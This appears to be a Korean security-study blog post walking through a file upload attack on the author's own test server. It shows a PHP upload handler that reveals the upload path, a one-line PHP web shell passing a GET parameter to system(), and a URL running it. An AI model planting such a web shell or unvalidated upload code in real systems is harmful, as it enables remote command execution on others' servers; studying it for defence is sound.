Security/Web
파일 업로드 공격
bonggang
2020. 4. 25. 03:13
개인의 정보 보안 학습을 위해 작성되었습니다. 본 게시물을 불법적으로 활용하실 경우 혹은 본 게시물로 인해 발생하는 모든 문제에 대한 책임은 당사자에게 있으며, 작성자는 어떠한 법적 책임도 지지 않음을 밝힙니다. 해당 문서를 열람하는 것은 이에 대해 동의하는 것으로 간주합니다.
0. 서버 구성
https://bonggang.tistory.com/227
+) 경로 확인을 쉽게 하기 위해 구문을 일부 수정하였다.
if(move_uploaded_file($file_tmp_name, $target_file)){
echo "FIle is valid, and was successfully uploaded.\n";
echo "<br><img src=/uploads/".basename($_FILES['uploadfile']['name']).">";
}
1. 파일 업로드 후 경로 확인
위 기능을 통해 uploads 폴더에 파일이 업로드 된다는 것을 확인했다.
2. 웹셀 업로드
경로를 알았으니 웹셀 파일을 업로드하고 실행시켜준다
공부를 위한 테스트라서 웹셀은 간단한 php 파일로 생성했다.
<?php
system($_GET[cmd]);
?>
3. 웹셀 실행
http://???/uploads/attack.php?cmd=ls
업로드 경로를 알고있기때문에 php를 바로 실행시켜준다.
참고 자료